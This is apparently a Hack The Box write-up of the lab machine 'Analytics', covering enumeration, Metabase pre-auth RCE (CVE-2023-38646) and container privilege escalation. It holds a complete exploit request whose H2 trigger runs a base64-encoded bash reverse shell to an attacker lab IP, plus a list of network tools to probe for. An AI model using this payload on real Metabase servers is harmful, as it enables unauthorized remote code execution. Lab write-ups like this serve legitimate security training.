Analytics
Personal Rating: Medium
Initial Enumeration
I started a full nmap scan and a vhost scan in the background.
sudo nmap -oA nmap-analytics -p- -A 10.10.11.233
ffuf -u http://10.10.11.233/ -H 'Host: FUZZ.analytical.htb' -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt -mc 200 -t 64
There is a webserver on port 80 -> analytical.htb
A login page references data.analytical.htb
According to Wappalyzer, there is Leaflet, React, Emotion, nginx, PWA, webpack, D3, HSTS, Ace and Lodash
So the webserver is based on Metabase. There is nothing in Hacktricks about it, so I will poke around for a bit by myself. The only exploit for it I could find online is CVE-2023-38646.
Metabase RCE
Following this guide, it seems promising: https://infosecwriteups.com/cve-2023-38646-metabase-pre-auth-rce-866220684396
I could identify the setup-token to be 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
This might show the request required for exploitation:
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
Following the guide above, I got a reverse shell with this request after getting the token and encoding the shell:
POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type: application/json
Cookie: metabase.DEVICE=ffe6f429-df53-4116-a173-9a822cdadb60
Content-Length: 818
{
"token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE2LjQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}Internal Enum & Persistence
In the reverse shell, most commands show “command not found”
I found a database file at /metabase.db/metabase.db.mv.db , which turns out to be a H2 database, according to this https://www.metabase.com/docs/latest/installation-and-operation/configuring-application-database
LinEnum gave me this:
This did allow for ssh login
It looks like we are inside an alpine docker container!
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
We have some binaries, but really not many:
/usr/bin/nc
/usr/bin/wget
/usr/bin/curl
/bin/ping
/bin/base64Running LinPEAS:
is modprobe present ............ lrwxrwxrwx 1 root root 12 Jun 14 15:03 /sbin/modprobe -> /bin/busybox
Privesc
After running LinPeas and googling for a while, I found this post https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/
After some more googling I found this PoC, which worked to get a root shell: https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh
Last updated